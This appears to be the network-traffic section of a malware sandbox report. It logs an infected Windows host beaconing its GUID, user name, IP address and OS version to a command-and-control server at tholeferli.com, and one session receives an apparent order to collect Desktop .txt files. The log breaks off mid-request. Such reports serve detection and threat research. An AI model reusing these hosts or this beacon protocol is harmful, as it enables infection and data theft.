                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.136.132A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.78.40A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.224.49A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.121.178A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:05.885163069 CEST8.8.8.8192.168.2.220x260dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.245.108A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:06.417241096 CEST8.8.8.8192.168.2.220x98dfNo error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)
                                                Jul 22, 2021 16:11:07.916183949 CEST8.8.8.8192.168.2.220x84b4No error (0)pospvisis.com95.213.179.67A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • api.ipify.org
                                                • tholeferli.com
                                                • s0lom0n.ru

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.224916754.235.88.12180C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:03.589586973 CEST0OUTGET / HTTP/1.1
                                                Accept: */*
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: api.ipify.org
                                                Cache-Control: no-cache
                                                Jul 22, 2021 16:11:03.760507107 CEST1INHTTP/1.1 200 OK
                                                Server: Cowboy
                                                Connection: keep-alive
                                                Content-Type: text/plain
                                                Vary: Origin
                                                Date: Thu, 22 Jul 2021 14:11:03 GMT
                                                Content-Length: 10
                                                Via: 1.1 vegur
                                                Data Raw: 38 34 2e 31 37 2e 35 32 2e 38
                                                Data Ascii: 84.17.52.8


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249168194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:04.034487963 CEST1OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:04.203983068 CEST2INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:04 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 33 63 0d 0a 41 47 54 5a 41 52 68 41 45 67 34 4f 43 6b 42 56 56 51 6c 4b 46 68 55 58 53 68 52 55 43 41 39 56 54 52 49 4a 45 42 77 65 51 77 31 4f 43 42 38 63 43 52 35 55 48 77 49 66 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 3cAGTZARhAEg4OCkBVVQlKFhUXShRUCA9VTRIJEBweQw1OCB8cCR5UHwIfBw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                10192.168.2.2249177194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:07.833553076 CEST302OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:07.989145994 CEST307INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4d 4e 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBMNYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                100192.168.2.2249267194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:53.939415932 CEST407OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:54.094969988 CEST407INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAZAZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                101192.168.2.2249268194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:54.388947964 CEST408OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:54.559727907 CEST409INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:54 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZYBAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                102192.168.2.2249269194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:54.844944954 CEST409OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:55.013587952 CEST410INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:54 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBBYYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                103192.168.2.2249270194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:55.295556068 CEST410OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:55.465261936 CEST411INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:55 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 56 45 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYVEBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                104192.168.2.2249271194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:55.757966042 CEST412OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:55.931896925 CEST412INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:55 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZAZAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                105192.168.2.2249272194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:56.205395937 CEST413OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:56.361907959 CEST413INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:56 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cACXZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                106192.168.2.2249273194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:56.635381937 CEST414OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:56.791811943 CEST414INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:56 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHFUSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                107192.168.2.2249274194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:57.102598906 CEST415OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:57.259892941 CEST415INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:57 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4d 4e 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQMNJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                108192.168.2.2249275194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:57.540949106 CEST416OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:57.710549116 CEST416INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:57 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 47 54 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAGTZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                109192.168.2.2249276194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:57.977777958 CEST417OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:58.146398067 CEST418INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:58 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMAZNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1195.213.179.6780192.168.2.2249178C:\Windows\SysWOW64\svchost.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:08.151878119 CEST307INData Raw: 00 27 00 00 00 01 00 00 00 15 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 65 73 6b 74 6f 70 00 00 00 05 2a 2e 74 78 74 05
                                                Data Ascii: '%userprofile%\Desktop*.txt
                                                Jul 22, 2021 16:11:08.152290106 CEST307OUTData Raw: 0c 00 0f 0a 0b 0a 0b 0a
                                                Data Ascii:
                                                Jul 22, 2021 16:11:08.152462006 CEST307OUTData Raw: 00 00 00 14 09 0a 0a 0a 1a 7a 65 79
                                                Data Ascii: zey
                                                Jul 22, 2021 16:11:08.152494907 CEST307OUTData Raw: 7a 7c 63 79 63 79 24 69 65 67 30 32 3a
                                                Data Ascii: z|cycy$ieg02:
                                                Jul 22, 2021 16:11:08.152674913 CEST307OUTData Raw: 00 00 00 0b 0a 0a 0a 0a
                                                Data Ascii:
                                                Jul 22, 2021 16:11:08.152766943 CEST307OUTData Raw: 0d 7a 65 7a 7a 7f 79 62
                                                Data Ascii: zezzyb
                                                Jul 22, 2021 16:11:08.270020008 CEST308INData Raw: 00 00 00 04 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                110192.168.2.2249277194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:58.418962955 CEST418OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:58.575879097 CEST419INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:58 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBNMYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                111192.168.2.2249278194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:58.852397919 CEST419OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:59.010420084 CEST420INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:58 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNHSMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                112192.168.2.2249279194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:59.314548969 CEST421OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:00.484059095 CEST421INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:00 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 4b 50 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAKPZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                113192.168.2.2249280194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:00.777880907 CEST422OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
